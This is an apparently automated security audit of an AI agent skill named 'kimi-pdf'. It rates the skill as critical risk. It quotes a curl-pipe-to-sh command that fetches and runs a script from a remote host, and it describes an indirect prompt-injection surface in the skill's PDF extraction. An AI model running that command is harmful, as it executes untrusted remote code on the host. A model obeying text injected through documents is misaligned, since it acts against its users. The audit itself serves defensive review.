kimi-pdf
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: CRITICAL
REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- REMOTE_CODE_EXECUTION (CRITICAL): Automated scans identified a piped remote execution pattern 'curl -fsSL https://drop-sh.fullyjustified.net | sh' associated with the skill's setup process. This allows an untrusted remote server to execute arbitrary commands on the host system.
- EXTERNAL_DOWNLOADS (HIGH): The 'pdf.sh' script installs packages globally via 'npm install -g' and 'npx playwright install'. This bypasses environment isolation and executes third-party code from remote registries at runtime without version pinning.
- PROMPT_INJECTION (LOW): The skill extracts text and tables from user-provided PDFs in 'cmd_extract.py' and 'cmd_form.py' without sanitization or boundary markers, creating an Indirect Prompt Injection surface.
  1. Ingestion points: 'pdf_path' and 'pages' arguments.
  2. Boundary markers: None.
  3. Capability inventory: File system read/write, subprocess execution (LibreOffice), and package management access.
  4. Sanitization: No sanitization or validation of the extracted PDF text is performed before it reaches the model context.
- COMMAND_EXECUTION (MEDIUM): The 'cmd_convert.py' script uses 'subprocess.run' to execute system commands for LibreOffice. Although it passes arguments as a list, the function operates directly on user-provided file paths, which could be exploited for path traversal or other local attacks.
Recommendations
- HIGH: Downloads and executes remote code from: https://drop-sh.fullyjustified.net - DO NOT USE without thorough review
- AI detected serious security threats